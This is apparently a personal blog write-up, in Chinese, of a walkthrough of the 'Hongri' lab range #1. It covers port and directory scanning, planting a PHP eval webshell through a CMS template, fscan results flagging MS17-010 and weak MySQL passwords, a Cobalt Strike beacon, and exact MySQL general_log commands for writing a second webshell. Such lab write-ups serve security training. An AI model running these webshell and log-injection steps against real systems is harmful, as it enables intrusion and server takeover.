红日靶场(一) | 风尘孤狼
0%

红日靶场(一)

红日靶场1练习记录

不是一次做完的,图片地址有所偏差

外网打点

外网192.168.206.129 内网192.168.52.143

只知道一个IP,先用nmap进行扫描吧,看看开放端口,开放80和3306端口

image-20230307111523371

image-20230307111604682

扫一下存活目录,得到一个baifen.rar,down下来瞅瞅,发现是一个yxcms的源码,不难猜测这这个80端口web服务应该就是yxcms,加了个路径发现猜想正确

image-20230307103414662

一个PHP网站,路径和账密都给了,直接进后台探测

在模板界面插入一句话

image-20230307104617678

image-20230307104627295

getshell之后上蚁剑

image-20230307104943462

169.254.129.156

传入fscan进行内网扫描

start infoscan
(icmp) Target 169.254.129.186 is alive
[*] Icmp alive hosts len is: 1
169.254.129.186:3306 open
169.254.129.186:445 open
169.254.129.186:139 open
169.254.129.186:135 open
169.254.129.186:80 open
[*] alive ports len is: 5
start vulscan
[*] NetInfo:
[*]169.254.129.186
   [->]stu1
   [->]192.168.52.143
   [->]169.254.129.186
   [->]192.168.18.132
[+] 169.254.129.186   MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] mysql:169.254.129.186:3306:root 123456
[*] NetBios: 169.254.129.186 stu1.god.org                        Windows 7 Professional 7601 Service Pack 1 
[*] WebTitle: http://169.254.129.186    code:200 len:14786  title:phpStudy 探针 2014

发现169.254.129.186存在永恒之蓝

3306mysql弱密码 root 123456

这里不难发现存在域环境

image-20230307110007024

image-20230307110020388

当前身份不是最高权限,考虑提权

考虑cs上线,tasklist未查询到杀软,所以不用免杀了,直接原生cs马即可

image-20230307110424376

提权不行还是这个权限

image-20230307113122746

不过刚才还有个mysql服务没有挖掘,可以看到路径

image-20230307113211434

访问之后弱口令登陆进去了 root/root

进来之后优先考虑的就是提权,udf或者mof提权,但是secure_file_priv存在NULL,利用不了

image-20230307123352896

尝试能否通过数据库再建立一个webshell

最常用的就是日志getshell

mysql5.0以上可以写入日志

先查看日志读写权限,默认是OFF

show variables like '%general%';

image-20230307130313922

打开general_log日志读写功能

SET GLOBAL general_log='on';

image-20230307130529957

前面知道绝对路径为 C:/phpStudy/WWW

将日志写入指定文件

SET GLOBAL general_log_file='C:/phpStudy/WWW/hzy.php';

写入一句话到这个文件

select "<?php eval($_POST[hzy]);?>"

image-20230307131349004

蚁剑连接之后查看权限还是上面那个,在域god.org内,还存在另一个网段169.254.129.0/24

使用neo进行内网代理

image-20230307144940044

因为DNS主机是192.168.52.138,一般来说会把DNS服务器安装在域控DC上,所以我猜测192.168.52.138是DC

这里插一嘴,其实在上面cs上线的时候就进行抓取密码了,并且拿到了明文密码,且RDP开放,但是输入密码一直显示错误,我不理解

image-20230307153110368

image-20230307153137700

最终捣鼓了一下,发现我看错用户名了,这波我的,最终改正确用户名,成功连接RDP

image-20230307155954191

是否存在域的判断方法

1.whoami hostname  看两者是否一样
2.ipconfig /all 看DNS
3.systeminfo  看是否有域一栏

image-20230307153329479

image-20230307153411039

断定有域的,域渗透能力有待提高

制作不易,如若感觉写的不错,欢迎打赏